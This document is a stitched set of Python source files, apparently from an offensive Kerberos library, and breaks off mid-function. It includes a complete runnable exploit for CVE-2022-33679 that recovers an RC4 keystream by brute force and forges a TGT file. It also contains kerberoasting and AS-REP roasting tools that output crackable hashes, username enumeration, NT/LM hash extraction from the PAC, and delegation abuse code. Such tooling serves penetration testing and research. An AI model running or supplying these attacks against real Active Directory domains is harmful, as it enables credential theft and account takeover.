		pa_pac_opts['padata-type'] = int(PADATA_TYPE('PA-PAC-OPTIONS'))
		pa_pac_opts['padata-value'] = PA_PAC_OPTIONS({'value' : PA_PAC_OPTIONSTypes(set(['resource-based constrained delegation']))}).dump()

		
		authenticator_data = {}
		authenticator_data['authenticator-vno'] = krb5_pvno
		authenticator_data['crealm'] = Realm(self.kerberos_TGT['crealm'])
		authenticator_data['cname'] = self.kerberos_TGT['cname']
		authenticator_data['cusec'] = now.microsecond
		authenticator_data['ctime'] = now.replace(microsecond=0)
		
		authenticator_data_enc = self.kerberos_cipher.encrypt(self.kerberos_session_key, 7, Authenticator(authenticator_data).dump(), None)
		
		ap_req = {}
		ap_req['pvno'] = krb5_pvno
		ap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value
		ap_req['ap-options'] = APOptions(set())
		ap_req['ticket'] = Ticket(self.kerberos_TGT['ticket'])
		ap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})
		
		pa_tgs_req = {}
		pa_tgs_req['padata-type'] = PaDataType.TGS_REQ.value
		pa_tgs_req['padata-value'] = AP_REQ(ap_req).dump()
		
		
		krb_tgs_body = {}
		#krb_tgs_body['kdc-options'] = KDCOptions(set(['forwardable','forwarded','renewable','renewable-ok', 'canonicalize']))
		krb_tgs_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','constrained-delegation', 'canonicalize']))
		krb_tgs_body['sname'] = PrincipalName({'name-type': NAME_TYPE.SRV_INST.value, 'name-string': spn_user.get_principalname()})
		krb_tgs_body['realm'] = self.credential.domain.upper()
		krb_tgs_body['till'] = (now + datetime.timedelta(days=1)).replace(microsecond=0)
		krb_tgs_body['nonce'] = secrets.randbits(31)
		krb_tgs_body['etype'] = [self.kerberos_session_key.enctype] #[supp_enc.value] #selecting according to server's preferences
		krb_tgs_body['additional-tickets'] = [s4uself_ticket]
		
		
		krb_tgs_req = {}
		krb_tgs_req['pvno'] = krb5_pvno
		krb_tgs_req['msg-type'] = MESSAGE_TYPE.KRB_TGS_REQ.value
		krb_tgs_req['padata'] = [pa_tgs_req, pa_pac_opts]
		krb_tgs_req['req-body'] = KDC_REQ_BODY(krb_tgs_body)
		
		req = TGS_REQ(krb_tgs_req)
		
		reply = await self.ksoc.sendrecv(req.dump())
		if reply.name == 'KRB_ERROR':
			emsg = 'S4U2proxy failed!'
			if reply.native['error-code'] == 16:
				emsg = 'S4U2proxy: Failed to get S4U2proxy! Error code (16) indicates that delegation is not enabled for this account!'
			
			raise KerberosError(reply, emsg)
		
		logger.debug('[S4U2proxy] Got server reply, decrypting...')
		tgs = reply.native
		
		encTGSRepPart = EncTGSRepPart.load(self.kerberos_cipher.decrypt(self.kerberos_session_key, 8, tgs['enc-part']['cipher'])).native
		key = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'])
		
		self.ccache.add_tgs(tgs, encTGSRepPart)
		logger.debug('[S4U2proxy] Got valid TGS reply')

		return tgs, encTGSRepPart, key
		
	def construct_apreq(self, tgs, encTGSRepPart, sessionkey, flags = None, seq_number = 0, ap_opts = [], cb_data = None):
		return construct_apreq_from_tgs_tgt(
			tgs, 
			sessionkey, 
			self.kerberos_TGT, 
			flags = flags, 
			seq_number = seq_number, 
			ap_opts = ap_opts, 
			cb_data = cb_data
		)
		
	async def getST(self, target_user, service_spn):
		tgs, encTGSRepPart, key  = await self.S4U2self(target_user)
		return await self.S4U2proxy(tgs['ticket'], service_spn)


	def decrypt_asrep_cert(self, as_rep):
		
		def truncate_key(value, keysize):
			output = b''
			currentNum = 0
			while len(output) < keysize:
				currentDigest = hashlib.sha1(bytes([currentNum]) + value).digest()
				if len(output) + len(currentDigest) > keysize:
					output += currentDigest[:keysize - len(output)]
					break
				output += currentDigest
				currentNum += 1
			
			return output

		for pa in as_rep['padata']:
			if pa['padata-type'] == 17:
				pkasrep = PA_PK_AS_REP.load(pa['padata-value']).native
				break
		else:
			raise Exception('PA_PK_AS_REP not found!')

		try:
			sd = cms.SignedData.load(pkasrep['dhSignedData']).native
		except:
			sd = cms.SignedData.load(pkasrep['dhSignedData'][19:]).native # !!!!!!!!!!!!! TODO: CHECKTHIS!!! Sometimes there is an OID before the struct?!
	
		keyinfo = sd['encap_content_info']
		if keyinfo['content_type'] != '1.3.6.1.5.2.3.2':
			raise Exception('Keyinfo content type unexpected value')
		authdata = KDCDHKeyInfo.load(keyinfo['content']).native
		pubkey = int(''.join(['1'] + [str(x) for x in authdata['subjectPublicKey']]), 2)		

		pubkey = int.from_bytes(core.BitString(authdata['subjectPublicKey']).dump()[7:], 'big', signed = False) # !!!!!!!!!!!!! TODO: CHECKTHIS!!!
		shared_key = self.credential.dhparams.exchange(pubkey)
		
		server_nonce = pkasrep['serverDHNonce']
		fullKey = shared_key + self.credential.dhparams.dh_nonce + server_nonce

		etype = as_rep['enc-part']['etype']
		cipher = _enctype_table[etype]
		if etype == Enctype.AES256:
			self.pkinit_tkey = truncate_key(fullKey, 32)
		elif etype == Enctype.AES128:
			self.pkinit_tkey = truncate_key(fullKey, 16)
		elif etype == Enctype.RC4:
			raise NotImplementedError('RC4 key truncation documentation missing. it is different from AES')
			#self.pkinit_tkey = truncate_key(fullKey, 16)
		

		key = Key(cipher.enctype, self.pkinit_tkey)
		enc_data = as_rep['enc-part']['cipher']
		dec_data = cipher.decrypt(key, 3, enc_data)
		encasrep = EncASRepPart.load(dec_data).native
		cipher = _enctype_table[ int(encasrep['key']['keytype'])]
		session_key = Key(cipher.enctype, encasrep['key']['keyvalue'])
		return encasrep, session_key, cipher


import os
import logging
import asyncio
from minikerberos.common.factory import KerberosClientFactory, kerberos_url_help_epilog
from minikerberos.common.spn import KerberosSPN
from minikerberos.aioclient import AIOKerberosClient
from minikerberos.common.kirbi import Kirbi

async def getTGS(kerberos_url, spn, kirbifile = None, ccachefile = None):
	if isinstance(spn, str):
		spn = KerberosSPN.from_spn(spn)

	cu = KerberosClientFactory.from_url(kerberos_url)
	client = cu.get_client()
	logging.debug('Getting TGT')
	await client.get_TGT()
	logging.debug('Getting TGS')
	tgs, encpart, key = await client.get_TGS(spn)
	if ccachefile is not None:
		client.ccache.to_file(ccachefile)
		print('TGT stored in ccache file %s' % ccachefile)
	
	kirbi = Kirbi.from_ticketdata(tgs, encpart)
	print(str(kirbi))
	if kirbifile is not None:
		kirbi.to_file(kirbifile)
		
	logging.info('Done!')

async def amain(args):

	if args.spn.find('@') == -1:
		raise Exception('SPN must contain @')
	t, domain = args.spn.split('@')
	if t.find('/') != -1:
		service, hostname = t.split('/')
	else:
		hostname = t
		service = None

	spn = KerberosSPN()
	spn.username = hostname
	spn.service = service
	spn.domain = domain

	cu = KerberosClientFactory.from_url(args.kerberos_connection_url)
	ccred = cu.get_creds()
	target = cu.get_target()
	
	logging.debug('Getting TGT')

	client = AIOKerberosClient(ccred, target)
	logging.debug('Getting TGT')
	await client.get_TGT()
	logging.debug('Getting TGS')
	await client.get_TGS(spn)
				
	client.ccache.to_file(args.ccache)
	logging.info('Done!')

def main():
	import argparse
	
	parser = argparse.ArgumentParser(description='Polls the kerberos service for a TGS for the sepcified user and specified service', formatter_class=argparse.RawDescriptionHelpFormatter, epilog = kerberos_url_help_epilog)
	parser.add_argument('-v', '--verbose', action='count', default=0)
	parser.add_argument('--ccache', help='CCACHE file to store the TGT ticket in, otherwise kirbi will be printed to stdout')
	parser.add_argument('--kirbi', help='kirbi file to store the TGT ticket in, otherwise kirbi will be printed to stdout')
	parser.add_argument('kerberos_url', help='the kerberos target string. ')
	parser.add_argument('spn', help='the SPN to request the TGS for. Must be in the format of service/host@domain')
	
	
	args = parser.parse_args()
	if args.verbose == 0:
		logging.basicConfig(level=logging.INFO)
	elif args.verbose == 1:
		logging.basicConfig(level=logging.DEBUG)
	else:
		logging.basicConfig(level=1)
	
	asyncio.run(amain(args))
	
if __name__ == '__main__':
	main()


# Exploit for CVE-2022-33679
# 
# This attack will work if the following conditions are met:
#  - DC is not patched
#  - Target user account is marked with the "Do not require Kerberos preauthentication" flag (check UAC)
#  - DC allows RC4_MD4 kerberos cipher to be used. Etype: -128 
# 
# Original project-zero issue: https://bugs.chromium.org/p/project-zero/issues/detail?id=2310
# Writeup: https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html
# 
# Found by: 
#  James Forshaw (@tiraniddo), Project Zero
#  
# This code by:
#  Tamas Jos (@skelsec)
#

import datetime
import logging
import asyncio
import base64
from minikerberos.common.factory import KerberosClientFactory, kerberos_url_help_epilog
from minikerberos.aioclient import AIOKerberosClient
from minikerberos.protocol.constants import EncryptionType
from minikerberos.protocol.encryption import Key, _enctype_table
from minikerberos.protocol.asn1_structs import PA_ENC_TS_ENC, HostAddress,\
	KRB_CRED, KrbCredInfo, EncKrbCredPart, EncryptedData, EncryptionKey,\
	PrincipalName, TicketFlags

def byte_xor(ba1, ba2):
    return bytes([_a ^ _b for _a, _b in zip(ba1, ba2)])

def get_padding_data():
	# for the attack to work, we need a TGT with a larger-than-normal AS-REP enc-data
	# we achieve this by adding a lot of hostaddresses in the AS-REQ, 
	# which will be reflected in the AS-REP
	hosts = []
	for x in range(50):
		hd = {
			'addr-type' : 1,
			'address' : b'\x00'*2 + x.to_bytes(2, byteorder='big', signed=False)
		}
		hosts.append(HostAddress(hd))
	return hosts

def calc_known_plaintext(cipher):
	# returns the known values for the initial structure which depends on the length
	# original data starts with 24 bytes of \x00 then the ASN1 struct
	# the first 24 bytes is where the cofounder and mac should be but in this case it's just zeroes
	cipher_length = len(cipher)
	if cipher_length <= 127:
		raise Exception('NO')
	header_length = 24
	data_length = cipher_length - header_length
	first_len = data_length - 4
	second_len = first_len - 4
	return b'\x00'*24 + b'\x79\x82' + first_len.to_bytes(2, byteorder='big', signed=False) + b'\x30\x82'+ second_len.to_bytes(2, byteorder='big', signed=False) +b'\xA0\x1B\x30\x19\xA0\x03\x02\x01\x80\xA1\x12\x04\x10'

def get_crafted_timestamp(n, now):
	# manually crafting a timestamp field for this exploit to work is an 
	# interesting yet painful thing to do.
	# See the writeup for more info, it's too long to explain here
	now = datetime.datetime.now(datetime.timezone.utc).replace(microsecond=0)
	nowstr = now.strftime('%Y%m%d%H%M%SZ')
	t = nowstr.encode() + b'\x00'
	tt = b'\x18'+len(t).to_bytes(1, byteorder='big', signed=False) + t
	ts_end = b'\xA0' + len(tt).to_bytes(1, byteorder='big', signed=False) + tt
	if n == 0:
		timestamp = b'\x30' + len(ts_end).to_bytes(1, byteorder='big', signed=False) + ts_end
	else:
		x = (0x80 + n).to_bytes(1, byteorder='big', signed=False) + b'\x00'*(n-1) + len(ts_end).to_bytes(1, byteorder='big', signed=False)
		timestamp = b'\x30'+ x + ts_end

	return timestamp

def format_kirbi(data, n = 100):
	kd = base64.b64encode(data).decode()
	return '    ' + '\r\n    '.join([kd[i:i+n] for i in range(0, len(kd), n)])

def tgt_to_kirbi(tgt, sessionkey, now):
	keyd = {
		'keytype': -128, 
		'keyvalue': sessionkey
	}

	ci = {}
	ci['key'] = EncryptionKey(keyd)
	ci['prealm'] = tgt['crealm']
	ci['pname'] = tgt['cname']
	ci['flags'] = TicketFlags(set(['enc-pa-rep', 'forwardable', 'renewable', 'initial', 'proxiable'])) #guessing...
	ci['authtime'] = now
	ci['starttime'] = now
	ci['endtime'] = (now + datetime.timedelta(days=1)).replace(microsecond=0)
	ci['renew-till'] = (now + datetime.timedelta(days=1)).replace(microsecond=0)
	ci['srealm'] = tgt['crealm'] # guessing! modify this if not valid....
	ci['sname'] = PrincipalName({'name-type': 1, 'name-string': ['krbtgt', tgt['crealm']]})

	ti = {}
	ti['ticket-info'] = [KrbCredInfo(ci)]

	te = {}
	te['etype']  = 0
	te['cipher'] = EncKrbCredPart(ti).dump()

	t = {}
	t['pvno'] = 5
	t['msg-type'] = 22
	t['enc-part'] = EncryptedData(te)
	t['tickets'] = [tgt['ticket']]

	return KRB_CRED(t)

async def exploit(kerberos_url, kirbifile=None):
	cu = KerberosClientFactory.from_url(kerberos_url)
	print('[+] FETCHING TGT...')
	client = cu.get_client()
	padding_data = {
		'addresses' : get_padding_data()
	}
	craftticket = client.build_asreq_lts(EncryptionType.ARCFOUR_MD4, kdc_req_body_extra=padding_data, no_preauth=True)
	rep = await client.ksoc.sendrecv(craftticket.dump())
	tgt = rep.native
	print('[+] GOT TGT...')
	
	now = datetime.datetime.now(datetime.timezone.utc).replace(microsecond=0)
	timestamp = PA_ENC_TS_ENC({'patimestamp': now.replace(microsecond=0)}).dump() #
	
	cipher_data = tgt['enc-part']['cipher']
	plaintext_data = calc_known_plaintext(cipher_data)
	cipher_data_header = cipher_data[:len(plaintext_data)]
	print('[+] PLAINTEXT FRAGMENT: %s ' % plaintext_data.hex())
	keystream = byte_xor(cipher_data_header, plaintext_data)
	print('[+] PARTIAL KEYSTREAM : %s' % keystream.hex())
	
	# verifying the guessed partial keystream by requesting a TGT but this time with pre-auth
	# the pre-auth will need the encrypted timestamp which we can forge with the partial keystream 
	print('[+] VERIFYING KEYSTREAM...')
	print('[i] TIMESTAMP    : %s' % timestamp.hex())
	enc_timestamp = byte_xor(b'\x00'*24+timestamp, keystream)
	print('[i] ENC TIMESTAMP: %s' % enc_timestamp.hex())
	craftticket = client.build_asreq_lts(EncryptionType.ARCFOUR_MD4, enctimestamp=enc_timestamp, newnow=now)
	#print('[i] CRAFTED AS-REQ: %s' % craftticket.dump().hex())
	rep = await client.ksoc.sendrecv(craftticket.dump())
	rep = rep.native
	if rep['msg-type'] == 30:
		print('[-] FAILED! Keystream is not good')
		return

	print('[+] PARTIAL KEYSTREAM WORKS! Got code : %s' % rep['msg-type'])
	print('[+] GUESSING REMAINING KEYSTREAM BYTES...')
	ctr = 0
	orig_keystream_len = len(keystream)
	for tslen in range(0,4): #5 is minumum
		for byteguess in range(256):
			ctr += 1
			byteguess = byteguess.to_bytes(1, byteorder='big', signed=False)
			keystream_guess = keystream + byteguess
			timestamp = get_crafted_timestamp(tslen, now)
			#print('TIMESTAMP ASCII  : %s' % timestamp)
			#print('TIMESTAMP        : %s' % timestamp.hex())
			#print('GUESSED KEYSTREAM: %s' % (keystream_guess).hex())
			enc_timestamp = byte_xor(b'\x00'*24+timestamp, keystream_guess)
			#print('ENC TIMESTAMP    : %s' % enc_timestamp.hex())
			craftticket = client.build_asreq_lts(EncryptionType.ARCFOUR_MD4, enctimestamp=enc_timestamp, newnow=now)
			#print('CRAFTED AS-REQ: %s' % craftticket.dump().hex())
			rep = await client.ksoc.sendrecv(craftticket.dump())
			rep = rep.native
			if rep['msg-type'] == 30:
				#print('Guessed wrong...')
				continue
			
			print('[+] Correctly guessed keystream byte position %s: 0x%s' % (hex(orig_keystream_len+tslen), byteguess.hex()))
			keystream = keystream_guess
			break
		else:
			print('All guesses failed!!!')
			return

	print('[+] GUESSED KEYSTREAM IN %s ITERATIONS' % ctr)
	now = datetime.datetime.now(datetime.timezone.utc).replace(microsecond=0)
	timestamp = PA_ENC_TS_ENC({'patimestamp': now.replace(microsecond=0)}).dump() #
	
	#creating timestamp asn1
	print('[+] REQUESTING FRESH TGT')
	enc_timestamp = byte_xor(b'\x00'*24+timestamp, keystream)
	craftticket = client.build_asreq_lts(EncryptionType.ARCFOUR_MD4, enctimestamp=enc_timestamp, newnow=now)
	rep = await client.ksoc.sendrecv(craftticket.dump())
	rep = rep.native
	if rep['msg-type'] == 30:
		print('FAILED! Keystream is not good :(')
		return

	print('[+] DECRYPTING AS-REP WITH KEYSTREAM')
	dec_data = byte_xor(rep['enc-part']['cipher'], keystream)
	session_key = dec_data[43:48] + b'\xAB' * 11
	print('[+] FOUND SESSION KEY: %s' % session_key.hex())

	client.kerberos_TGT = rep
	client.kerberos_cipher = _enctype_table[-128]
	client.kerberos_cipher_type = -128
	client.kerberos_session_key = Key(-128, session_key)
	
	kirbi = tgt_to_kirbi(rep, session_key, now).dump()
	print('[+] KIRBI DATA:')
	print(format_kirbi(kirbi))
	filename = '%s.kirbi' % (now.strftime("%Y%m%d_%H%M%S"))
	if kirbifile is not None:
		filename = kirbifile
	
	print('[+] Writing .kirbi file to: %s' % filename)
	with open(filename, 'wb') as f:
		f.write(kirbi)
	

def main():
	import argparse
	
	parser = argparse.ArgumentParser(description='Fetches TGT&session key for user who doesnt need kerberos preauth. CVE-2022-33679.', usage='Use it with a valid kerberus URL but any password. Example: "cve202233679 \'kerberos+none://TEST\\asreptest@10.10.10.2\'"')
	parser.add_argument('kerberos_url', help='the kerberos target string. ')
	parser.add_argument('-v', '--verbose', action='count', default=0)
	
	args = parser.parse_args()
	if args.verbose == 0:
		logging.basicConfig(level=logging.INFO)
	elif args.verbose == 1:
		logging.basicConfig(level=logging.DEBUG)
	else:
		logging.basicConfig(level=1)
	
	asyncio.run(exploit(args.kerberos_url))
	
	
if __name__ == '__main__':
	main()


import logging
import asyncio
import traceback
import pathlib
from minikerberos.common.factory import KerberosClientFactory, kerberos_url_help_epilog
from minikerberos.security import kerberoast
from typing import List

async def spnroast(connection_url:str, users:List[str], domain:str = None, out_file:str = None, etypes:List[int] = [23,17,18]):
	try:
		results_ok = []
		results_err = []
		cu = KerberosClientFactory.from_url(connection_url)
		if isinstance(users, str):
			if pathlib.Path(users).exists():
				with open(users, 'r') as f:
					users = f.read().splitlines()
			else:
				users = [users]
		
		if isinstance(etypes, str):
			etypes = [int(x) for x in etypes.split(',')]
		if isinstance(etypes, int):
			etypes = [etypes]
		
		if domain is None:
			for username in users:
				if username.find('@') != -1:
					domain = username.split('@')[1]
					break
			else:
				domain = cu.get_creds().domain
		if domain is None:
			raise Exception('No domain specified')
		
		users_nodomain = []
		for username in users:
			if username.find('@') != -1:
				users_nodomain.append(username.split('@')[0])
			else:
				users_nodomain.append(username)
		
		async for username, res, err in kerberoast(cu, users_nodomain, domain, override_etype=etypes):
			if err is not None:
				results_err.append((username, err))
				continue
			results_ok.append((username, res))	

		if out_file is not None:
			with open(out_file, 'w', newline='') as f:
				for _, result in results_ok:
					f.write(result + '\r\n')
		
		for _, err in results_err:
			print('%s error: %s' % (username, err))
		for _, result in results_ok:
			print(result)
		
	except Exception as e:
		traceback.print_exc()

async def amain():
	import argparse
	
	parser = argparse.ArgumentParser(description='Kerberoast', formatter_class=argparse.RawDescriptionHelpFormatter, epilog = kerberos_url_help_epilog)
	parser.add_argument('kerberos_connection_url', help='the kerberos target string in the following format kerberos+<stype>://<domain>\\<username>@<domaincontroller-ip>')
	parser.add_argument('domain', help='Realm. Use this if you specify username in "spn" field')
	parser.add_argument('users', nargs ='*', help='User/username to kerberoast. Can be a file with usernames, or a single username.')
	parser.add_argument('-e', '--etypes', default='23,17,18', help='Encryption types to use. Default: 23,17,18')
	parser.add_argument('-o', '--out-file', help='Write results to this file instead of printing them')
	parser.add_argument('-v', '--verbose', action='count', default=0)
	
	args = parser.parse_args()
	if args.verbose == 0:
		logging.basicConfig(level=logging.INFO)
	elif args.verbose == 1:
		logging.basicConfig(level=logging.DEBUG)
	else:
		logging.basicConfig(level=1)
	
	await spnroast(args.kerberos_connection_url, args.users, args.domain, args.out_file, args.etypes)

def main():
	asyncio.run(amain())
	
if __name__ == '__main__':
	main()


import shutil
import os

from minikerberos.common.factory import KerberosClientFactory
from minikerberos.common.ccache import CCACHE
from .config import *


def test_url_nt_1():
	urlstr = 'kerberos+nt://domain\\user:921a7fece11f4d8c72432e41e40d0372@127.0.0.1'
	url = KerberosClientFactory.from_url(urlstr)
	cred = url.get_creds()
	assert cred.domain == 'domain'
	assert cred.username == 'user'
	assert cred.nt_hash == '921a7fece11f4d8c72432e41e40d0372'
	assert cred.kerberos_key_rc4 == '921a7fece11f4d8c72432e41e40d0372'

	target = url.get_target()
	assert target.ip == '127.0.0.1'
	assert target.port == 88


def test_url_pw_1():
	urlstr = 'kerberos+password://domain\\user:pass@word34tnk;adfs@127.0.0.1'
	url = KerberosClientFactory.from_url(urlstr)
	cred = url.get_creds()
	assert cred.domain == 'domain'
	assert cred.username == 'user'
	assert cred.password == 'pass@word34tnk;adfs'

	target = url.get_target()
	assert target.ip == '127.0.0.1'
	assert target.port == 88

def test_url_aes():
	urlstr = 'kerberos+aes://domain\\user:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@dc_ip'
	url = KerberosClientFactory.from_url(urlstr)
	cred = url.get_creds()
	assert cred.domain == 'domain'
	assert cred.username == 'user'
	assert cred.kerberos_key_aes_128 == 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
	assert cred.kerberos_key_aes_256 == None
	
	target = url.get_target()
	assert target.hostname == 'dc_ip'
	assert target.port == 88

def test_url_aes_256():
	urlstr = 'kerberos+aes256://domain\\user:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@dc_ip'
	url = KerberosClientFactory.from_url(urlstr)
	cred = url.get_creds()
	assert cred.domain == 'domain'
	assert cred.username == 'user'
	assert cred.kerberos_key_aes_128 == None
	assert cred.kerberos_key_aes_256 == 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
	
	target = url.get_target()
	assert target.hostname == 'dc_ip'
	assert target.port == 88

def test_url_rc4():
	urlstr = 'kerberos+rc4://domain\\user:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@dc_ip'
	url = KerberosClientFactory.from_url(urlstr)
	cred = url.get_creds()
	assert cred.domain == 'domain'
	assert cred.username == 'user'
	assert cred.kerberos_key_rc4 == 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
	
	target = url.get_target()
	assert target.hostname == 'dc_ip'
	assert target.port == 88

def test_url_ccachefile():
	ccache1 = CCACHE.from_file(ADMIN_CCACHE)
	targets = [x for x in ccache1.list_targets()]
	try:
		shutil.copy(ADMIN_CCACHE, 'a.ccache')
		urlstr = 'kerberos+ccache://domain\\user:a.ccache@dc_ip'
		url = KerberosClientFactory.from_url(urlstr)
		cred = url.get_creds()
		assert cred.domain == 'domain'
		assert cred.username == 'user'
		targets2 = [x for x in cred.ccache.list_targets()]
		assert listcompare(targets, targets2)
		
		target = url.get_target()
		assert target.hostname == 'dc_ip'
		assert target.port == 88
	finally:
		os.remove('a.ccache')

def test_url_kirbi():
	for kirbifile in get_testfiles_kirbi():
		try:
			shutil.copy(kirbifile, 'a.kirbi')
			urlstr = 'kerberos+kirbi://domain\\user:a.kirbi@dc_ip'
			url = KerberosClientFactory.from_url(urlstr)
			cred = url.get_creds()
			assert cred.domain.upper() == 'TEST.CORP'
			assert cred.username.upper().find('VICTIM') != -1

			target = url.get_target()
			assert target.hostname == 'dc_ip'
			assert target.port == 88

		finally:
			os.remove('a.kirbi')

def test_url_string():
	urlstr = 'kerberos+nt://domain\\user:921a7fece11f4d8c72432e41e40d0372@127.0.0.1'
	url = KerberosClientFactory.from_url(urlstr)
	cred1 = url.get_creds()
	target1 = url.get_target()
	url2 = KerberosClientFactory.from_url(urlstr)
	cred2 = url2.get_creds()
	target2 = url2.get_target()
	assert str(cred1) == str(cred2)
	assert str(target1) == str(target2)

def test_url_nopreauth():
	urlstr = 'kerberos+none://domain\\user@127.0.0.1'
	url = KerberosClientFactory.from_url(urlstr)
	cred1 = url.get_creds()
	target1 = url.get_target()
	url2 = KerberosClientFactory.from_url(urlstr)
	cred2 = url2.get_creds()
	target2 = url2.get_target()
	assert str(cred1) == str(cred2)
	assert str(target1) == str(target2)

def test_url_nopreauth():
	urlstr = 'kerberos+none://domain\\user@127.0.0.1'
	url = KerberosClientFactory.from_url(urlstr)
	cred1 = url.get_creds()
	target1 = url.get_target()
	url2 = KerberosClientFactory.from_url(urlstr)
	cred2 = url2.get_creds()
	target2 = url2.get_target()
	assert str(cred1) == str(cred2)
	assert str(target1) == str(target2)

#def test_url_certstore():
#	urlstr = 'kerberos+certstore://127.0.0.1/?cn=whoami@domain&certstore=MY'
#	url = KerberosClientFactory.from_url(urlstr)
#	cred1 = url.get_creds()
#	target1 = url.get_target()
#	url2 = KerberosClientFactory.from_url(urlstr)
#	cred2 = url2.get_creds()
#	target2 = url2.get_target()
#	assert str(cred1) == str(cred2)
#	assert str(target1) == str(target2)

if __name__ == '__main__':
	test_url_certstore()


from minikerberos.protocol.asn1_structs import EncTicketPart, AD_IF_RELEVANT
from minikerberos.protocol.external.rpcrt import TypeSerialization1
from minikerberos.protocol.external.pac import PACTYPE, PAC_INFO_BUFFER, \
	PAC_CREDENTIAL_INFO, PAC_CREDENTIAL_DATA, NTLM_SUPPLEMENTAL_CREDENTIAL
from minikerberos import logger
from minikerberos.protocol.encryption import Key, _enctype_table

def get_NT_from_PAC(pkinit_tkey, decticket:EncTicketPart, truncated_keydata=None):
		adIfRelevant = AD_IF_RELEVANT.load(decticket['authorization-data'][0]['ad-data'])		
		if truncated_keydata is None:
			truncated_keydata = pkinit_tkey
		if truncated_keydata is None:
			raise Exception("Missing tkey! Is this a PKINIT session?")
		key = Key(18, truncated_keydata)
		pacType = PACTYPE(adIfRelevant.native[0]['ad-data'])
		buff = pacType['Buffers']
		creds = []
		for bufferN in range(pacType['cBuffers']):
			infoBuffer = PAC_INFO_BUFFER(buff)
			data = pacType['Buffers'][infoBuffer['Offset']-8:][:infoBuffer['cbBufferSize']]
			logger.debug("TYPE 0x%x" % infoBuffer['ulType'])
			if infoBuffer['ulType'] == 2:
				credinfo = PAC_CREDENTIAL_INFO(data)
				newCipher = _enctype_table[credinfo['EncryptionType']]

				out = newCipher.decrypt(key, 16, credinfo['SerializedData'])
				type1 = TypeSerialization1(out)
				# I'm skipping here 4 bytes with its the ReferentID for the pointer
				newdata = out[len(type1)+4:]
				pcc = PAC_CREDENTIAL_DATA(newdata)
				for cred in pcc['Credentials']:
					credstruct = NTLM_SUPPLEMENTAL_CREDENTIAL(b''.join(cred['Credentials']))
					if credstruct['NtPassword'] != b'\x00'*16:
						creds.append(('NT', credstruct['NtPassword'].hex()))
					if credstruct['LmPassword'] != b'\x00'*16:
						creds.append(('LM', credstruct['LmPassword'].hex()))

			buff = buff[len(infoBuffer):]
		
		return creds


import datetime
import secrets

from minikerberos import logger
from minikerberos.aioclient import AIOKerberosClient
from minikerberos.network.aioclientsocket import AIOKerberosClientSocket
from minikerberos.common.spn import KerberosSPN
from minikerberos.common.target import KerberosTarget
from minikerberos.common.creds import KerberosCredential
from minikerberos.common.utils import TGSTicket2hashcat, TGTTicket2hashcat
from minikerberos import logger
from minikerberos.protocol.asn1_structs import PrincipalName, KDCOptions, \
	PADATA_TYPE, PA_PAC_REQUEST, krb5_pvno, KDC_REQ_BODY, AS_REQ

from minikerberos.protocol.errors import KerberosErrorCode
from minikerberos.protocol.constants import NAME_TYPE, MESSAGE_TYPE
from typing import List
from minikerberos.common.factory import KerberosClientFactory


async def krb5userenum(target:KerberosTarget, usernames:List[str], domain:str):
	def construct_tgt_req(username:str, domain:str):
		now = now = datetime.datetime.now(datetime.timezone.utc)
		kdc_req_body = {}
		kdc_req_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','proxiable']))
		kdc_req_body['cname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': [username]})
		kdc_req_body['realm'] = domain.upper()
		kdc_req_body['sname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': ['krbtgt', domain.upper()]})
		kdc_req_body['till']  = (now + datetime.timedelta(days=1)).replace(microsecond=0)
		kdc_req_body['rtime'] = (now + datetime.timedelta(days=1)).replace(microsecond=0)
		kdc_req_body['nonce'] = secrets.randbits(31)
		kdc_req_body['etype'] = [23, 17, 18] #we "support" all MS related enctypes
		
		pa_data_1 = {}
		pa_data_1['padata-type'] = int(PADATA_TYPE('PA-PAC-REQUEST'))
		pa_data_1['padata-value'] = PA_PAC_REQUEST({'include-pac': True}).dump()
		
		kdc_req = {}
		kdc_req['pvno'] = krb5_pvno
		kdc_req['msg-type'] = MESSAGE_TYPE.KRB_AS_REQ.value
		kdc_req['padata'] = [pa_data_1]
		kdc_req['req-body'] = KDC_REQ_BODY(kdc_req_body)
		
		return AS_REQ(kdc_req)
	
	for username in usernames:
		ksoc = AIOKerberosClientSocket(target)
		req = construct_tgt_req(username, domain)
		rep = await ksoc.sendrecv(req.dump(), throw = False)
		if rep.name != 'KRB_ERROR':	
			# user doesnt need preauth, but it exists
			yield username, True, rep, None
			
		elif rep.native['error-code'] != KerberosErrorCode.KDC_ERR_PREAUTH_REQUIRED.value:
			# any other error means user doesnt exist
			yield username, False, rep, None
			
		else:
			# preauth needed, only if user exists
			yield username, True, rep, None


async def kerberoast(factory:KerberosClientFactory, usernames:List[str], domain:str, override_etype:List[int] = [23,17,18]):
	if not isinstance(usernames, list):
		usernames = [usernames]
	if not isinstance(override_etype, list):
		override_etype = [override_etype]
	
	kcomm = factory.get_client()
	await kcomm.get_TGT(override_etype = override_etype, decrypt_tgt = False)

	for username in usernames:
		try:
			spn = KerberosSPN.from_upn('%s@%s' % (username, domain))
			tgs, _, _ = await kcomm.get_TGS(spn, override_etype = override_etype)
			yield username, TGSTicket2hashcat(tgs), None
		except Exception as e:
			logger.debug('Failed to get TGS ticket for user %s! Reason: %s' % (username, str(e)))
			yield username, None, str(e)


async def asreproast(target:KerberosTarget, usernames:List[str], domain:str, override_etype:List[int] = [23,17,18]):
	if not isinstance(usernames, list):
		usernames = [usernames]
	if not isinstance(override_etype, list):
		override_etype = [override_etype]
		
	for username in usernames:
		try:
			cred = KerberosCredential()
			cred.domain = domain
			cred.username = username
			kcomm = AIOKerberosClient(cred, target)
			await kcomm.get_TGT(override_etype = override_etype, decrypt_tgt = False)
